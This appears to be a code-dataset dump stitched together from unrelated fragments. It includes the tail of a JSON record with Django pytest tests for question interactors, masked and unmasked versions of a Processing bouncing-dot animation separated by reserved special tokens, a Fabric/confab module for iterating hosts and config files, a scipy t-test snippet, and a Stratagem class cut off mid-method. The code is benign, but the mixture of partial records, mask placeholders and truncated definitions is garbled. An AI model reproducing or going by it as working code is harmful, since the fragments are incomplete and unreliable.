"step-4": "import pytest\nfrom django_swagger_utils.drf_server.exceptions import NotFound\nfrom unittest.mock import create_autospec\nfrom content_management_portal.constants.enums import TextType\nfrom content_management_portal.interactors.storages.storage_interface import StorageInterface\nfrom content_management_portal.interactors.presenters.question_presenter_interface import PresenterInterface\nfrom content_management_portal.interactors.question_creation_interactor import QuestionCreateInteractor\nfrom content_management_portal.interactors.question_updation_interactor import QuestionUpdateInteractor\nfrom content_management_portal.interactors.question_deletion_interactor import QuestionDeletionInteractor\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self, questiondto):\n user_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionCreateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_creation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content)\n storage.question_creation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_update(self, questiondto):\n user_id = 1\n question_id = 1\n short_title = 'hello'\n content_type = 'HTML'\n content = 'hi'\n storage = create_autospec(StorageInterface)\n presenter = create_autospec(PresenterInterface)\n interactor = QuestionUpdateInteractor(storage=storage, presenter=\n presenter)\n interactor.question_updation(user_id=user_id, short_title=\n short_title, content_type=content_type, content=content,\n question_id=question_id)\n storage.question_updation.assert_called_once_with(user_id=user_id,\n short_title=short_title, content_type=content_type, content=\n content, 
question_id=question_id)\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_deletion(self):\n question_id = 1\n storage = create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n interactor.question_deletion(question_id=question_id)\n storage.question_deletion.assert_called_once_with(question_id=\n question_id)\n",
"step-5": "import pytest\nfrom django_swagger_utils.drf_server.exceptions import NotFound\nfrom unittest.mock import create_autospec\n\nfrom content_management_portal.constants.enums import TextType\nfrom content_management_portal.interactors.storages.storage_interface \\\n import StorageInterface\nfrom content_management_portal.interactors.presenters. \\\n question_presenter_interface import PresenterInterface\nfrom content_management_portal.interactors.question_creation_interactor \\\n import QuestionCreateInteractor\nfrom content_management_portal.interactors.question_updation_interactor \\\n import QuestionUpdateInteractor\nfrom content_management_portal.interactors.question_deletion_interactor \\\n import QuestionDeletionInteractor\n\n\nclass TestQuestionInteractor:\n\n def test_question_create(self,questiondto):\n user_id=1\n short_title=\"hello\"\n content_type=\"HTML\"\n content=\"hi\"\n\n storage=create_autospec(StorageInterface)\n presenter=create_autospec(PresenterInterface)\n\n interactor = QuestionCreateInteractor(storage=storage,presenter=presenter)\n interactor.question_creation(user_id=user_id,short_title=short_title, \\\n content_type=content_type, content=content)\n\n # Assert\n storage.question_creation.assert_called_once_with( \\\n user_id=user_id,\n short_title=short_title,\n content_type=content_type,\n content=content\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n\n def test_question_update(self,questiondto):\n user_id=1\n question_id=1\n short_title=\"hello\"\n content_type=\"HTML\"\n content=\"hi\"\n\n storage=create_autospec(StorageInterface)\n presenter=create_autospec(PresenterInterface)\n\n interactor = QuestionUpdateInteractor(storage=storage,presenter=presenter)\n interactor.question_updation(user_id=user_id,\n short_title=short_title,\n content_type=content_type,\n content=content,\n question_id=question_id\n )\n\n\n # Assert\n storage.question_updation.assert_called_once_with( \\\n user_id=user_id,\n 
short_title=short_title,\n content_type=content_type,\n content=content,\n question_id=question_id\n )\n presenter.get_question_dto_response(questiondto=questiondto)\n \n def test_question_deletion(self):\n\n # Arrange\n question_id=1\n storage=create_autospec(StorageInterface)\n interactor = QuestionDeletionInteractor(storage=storage)\n \n # Act\n interactor.question_deletion(question_id=question_id)\n \n # Assert\n storage.question_deletion.assert_called_once_with(question_id=question_id)\n \n \n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def draw():
    """Per-frame Processing callback: animate a decaying bounce with trails."""
    global h, xorg, yoff, xcount, xvel
    # Every 10th frame, wash the canvas with a translucent background color
    # so previously drawn circles fade out gradually (motion trails).
    if frameCount % 10 == 0:
        fill(140, 0.49, 0.75, 0.2)
        square(0, 0, width)
    pushMatrix()
    # Draw relative to the current bounce origin (xorg, yoff).
    translate(xorg, yoff)
    # Half-sine over a 20-frame cycle, scaled by the current amplitude h.
    y = sin(frameCount % 20 / 20.0 * PI + PI) * h
    if frameCount % 20 == 0 and frameCount > 0:
        # End of a bounce cycle: shrink the amplitude.
        h -= 50
        if h <= 0:
            # Bounce has fully decayed: draw a flattened "splat" ellipse plus
            # a final dot, then re-randomize origin, velocity and amplitude.
            fill(0)
            ellipse(xcount, y, 25, 10)
            fill(0, 0, 1)
            circle(xcount, y, 5)
            yoff = random(300, 700)
            xcount = 0
            xvel = random(1, 3)
            # Half the time, reverse direction and start from the right side.
            if random(1) > 0.5:
                xvel *= -1
                xorg = random(400, 600)
            else:
                xorg = random(50, 400)
            # New amplitude: a random multiple of 50 in [150, 300].
            h = int(random(3, 7)) * 50
    else:
        # Mid-cycle frame: draw the moving dot and advance horizontally.
        fill(0, 0, 1)
        circle(xcount, y, 5)
        xcount += xvel
    popMatrix()
    # Export each frame as a numbered JPEG for later assembly into video.
    saveFrame('frames/####.jpg')
    if frameCount > 700:
        noLoop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def setup():
    """One-time Processing setup: canvas, color model, frame rate."""
    size(800, 800)
    # HSB color model: hue in 0-360, saturation/brightness/alpha in 0-1.
    colorMode(HSB, 360, 1, 1, 1)
    background(140, 0.49, 0.75)
    frameRate(30)
    noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
<|reserved_special_token_1|>
h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
<|reserved_special_token_1|>
h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0,0,width)
pushMatrix()
translate(xorg,yoff)
y = sin((frameCount%20)/20.0*PI+PI)*h
if (frameCount % 20 == 0 and frameCount > 0):
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0,0,1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1,3)
if random(1)>0.5:
xvel *= -1
xorg = random(400,600)
else:
xorg = random(50,400)
h = int(random(3,7))*50
else:
fill(0,0,1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame("frames/####.jpg")
if frameCount > 700:
noLoop()
|
flexible
|
{
"blob_id": "2257494dec9fccc4e8bd4acf0aff31a73c252a61",
"index": 616,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0, 0, width)\n pushMatrix()\n translate(xorg, yoff)\n y = sin(frameCount % 20 / 20.0 * PI + PI) * h\n if frameCount % 20 == 0 and frameCount > 0:\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0, 0, 1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1, 3)\n if random(1) > 0.5:\n xvel *= -1\n xorg = random(400, 600)\n else:\n xorg = random(50, 400)\n h = int(random(3, 7)) * 50\n else:\n fill(0, 0, 1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n saveFrame('frames/####.jpg')\n if frameCount > 700:\n noLoop()\n",
"step-3": "<mask token>\n\n\ndef setup():\n size(800, 800)\n colorMode(HSB, 360, 1, 1, 1)\n background(140, 0.49, 0.75)\n frameRate(30)\n noStroke()\n\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0, 0, width)\n pushMatrix()\n translate(xorg, yoff)\n y = sin(frameCount % 20 / 20.0 * PI + PI) * h\n if frameCount % 20 == 0 and frameCount > 0:\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0, 0, 1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1, 3)\n if random(1) > 0.5:\n xvel *= -1\n xorg = random(400, 600)\n else:\n xorg = random(50, 400)\n h = int(random(3, 7)) * 50\n else:\n fill(0, 0, 1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n saveFrame('frames/####.jpg')\n if frameCount > 700:\n noLoop()\n",
"step-4": "h = 160\nxorg = 0\nyoff = 400\nxcount = 0\nxvel = 2\n\n\ndef setup():\n size(800, 800)\n colorMode(HSB, 360, 1, 1, 1)\n background(140, 0.49, 0.75)\n frameRate(30)\n noStroke()\n\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0, 0, width)\n pushMatrix()\n translate(xorg, yoff)\n y = sin(frameCount % 20 / 20.0 * PI + PI) * h\n if frameCount % 20 == 0 and frameCount > 0:\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0, 0, 1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1, 3)\n if random(1) > 0.5:\n xvel *= -1\n xorg = random(400, 600)\n else:\n xorg = random(50, 400)\n h = int(random(3, 7)) * 50\n else:\n fill(0, 0, 1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n saveFrame('frames/####.jpg')\n if frameCount > 700:\n noLoop()\n",
"step-5": "h = 160\nxorg = 0\nyoff = 400\nxcount = 0\nxvel = 2\n\ndef setup():\n size(800, 800)\n colorMode(HSB, 360, 1, 1, 1)\n background(140, 0.49, 0.75)\n frameRate(30)\n noStroke()\n\ndef draw():\n global h, xorg, yoff, xcount, xvel\n if frameCount % 10 == 0:\n fill(140, 0.49, 0.75, 0.2)\n square(0,0,width)\n pushMatrix()\n translate(xorg,yoff)\n y = sin((frameCount%20)/20.0*PI+PI)*h\n if (frameCount % 20 == 0 and frameCount > 0):\n h -= 50\n if h <= 0:\n fill(0)\n ellipse(xcount, y, 25, 10)\n fill(0,0,1)\n circle(xcount, y, 5)\n yoff = random(300, 700)\n xcount = 0\n xvel = random(1,3)\n if random(1)>0.5:\n xvel *= -1\n xorg = random(400,600)\n else:\n xorg = random(50,400)\n h = int(random(3,7))*50\n else:\n fill(0,0,1)\n circle(xcount, y, 5)\n xcount += xvel\n popMatrix()\n \n saveFrame(\"frames/####.jpg\")\n if frameCount > 700:\n noLoop()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Iterations over :term:`hosts<host>`, :term:`roles<role>`,
:term:`components<component>` and config files.
"""
from contextlib import contextmanager
from fabric.api import env, settings, abort
from os.path import join
from pkg_resources import iter_entry_points
from warnings import warn
from fabric.network import ssh_config
from confab.options import options
from confab.validate import assert_exists
from confab.loaders import FileSystemEnvironmentLoader
from confab.data import DataLoader
from confab.conffiles import ConfFiles
@contextmanager
def this_hostname(hostname):
"""
Context manager that uses the current SSH confg to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get("port", env.default_port)
with settings(host_string=host_string,
port=port):
yield
def _get_environmentdef():
"""
Retreive the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort("Environment needs to be configured")
environmentdef = env.environmentdef
# If we're running via `fab`, we should restrict the environment
# to the current host.
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
# fabric needs the host if we're calling from main()
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
# fabric needs the host if we're calling from main()
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
# Construct directories
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role,
FileSystemEnvironmentLoader(*templates_dirs),
DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group="confab.extensions"):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
|
normal
|
{
"blob_id": "cc019c732003ed72db80a7893096a0bef0f12e47",
"index": 4168,
"step-1": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\n<mask token>\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base 
path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-2": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return 
ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-3": "<mask token>\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data 
directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-4": "<mask token>\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\nfrom fabric.network import ssh_config\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for 
host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-5": "\"\"\"\nIterations over :term:`hosts<host>`, :term:`roles<role>`,\n:term:`components<component>` and config files.\n\"\"\"\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\n\nfrom fabric.network import ssh_config\n\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n\n host_string = hostname\n port = host_config.get(\"port\", env.default_port)\n\n with settings(host_string=host_string,\n port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort(\"Environment needs to be configured\")\n\n environmentdef = env.environmentdef\n\n # If we're running via `fab`, we should restrict the environment\n # to the current host.\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host in environmentdef.hosts():\n # fabric needs the host if we're calling from main()\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host_and_role in environmentdef.all():\n # fabric needs the host if we're calling from main()\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef 
iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n\n # Construct directories\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n\n return ConfFiles(host_and_role,\n FileSystemEnvironmentLoader(*templates_dirs),\n DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import numpy as np
from scipy import stats
a = np.random.normal(25.0, 5.0, 10000)
b = np.random.normal(26.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness
b = np.random.normal(25.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # no change, outcome is likely random
|
normal
|
{
"blob_id": "ba85f3c8a9e40f30076c13487a97567f7bc646dc",
"index": 8041,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(stats.ttest_ind(a, b))\n<mask token>\nprint(stats.ttest_ind(a, b))\n",
"step-3": "<mask token>\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-4": "import numpy as np\nfrom scipy import stats\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-5": "import numpy as np\r\nfrom scipy import stats\r\n\r\na = np.random.normal(25.0, 5.0, 10000)\r\nb = np.random.normal(26.0, 5.0, 10000)\r\n\r\nprint(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness\r\n\r\nb = np.random.normal(25.0, 5.0, 10000)\r\nprint(stats.ttest_ind(a, b)) # no change, outcome is likely random\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Stratagem:
<|reserved_special_token_0|>
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
